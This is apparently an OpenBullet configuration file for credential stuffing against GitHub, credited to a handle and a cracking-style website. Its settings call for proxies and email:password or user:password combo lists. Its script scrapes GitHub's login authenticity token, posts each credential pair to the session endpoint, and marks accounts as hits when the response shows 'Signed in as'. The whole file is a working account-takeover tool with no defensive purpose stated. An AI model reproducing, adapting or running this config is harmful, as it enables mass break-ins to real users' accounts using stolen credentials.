[SETTINGS]
{
  "Name": "github.com",
  "SuggestedBots": 100,
  "LastModified": "2019-03-08T02:33:25.8985579+01:00",
  "AdditionalInfo": "",
  "Author": "Kirikioo#2379 | www.black-gen.pw",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_TOKEN REQUEST GET "https://github.com/login" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#PARSE_TOKEN PARSE "<SOURCE>" LR "token\" value=\"" "\" />      " Recursive=FALSE -> VAR "Token" "" "" 
#POST_LOGIN REQUEST POST "https://github.com/session" AutoRedirect=TRUE 
  CONTENT "commit=Sign+in&utf8=%E2%9C%93&authenticity_token=<Token>&login=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Incorrect username or password." 
    KEY "Please verify your email address" 
  KEYCHAIN Success OR 
    KEY ">Signed in as <" 
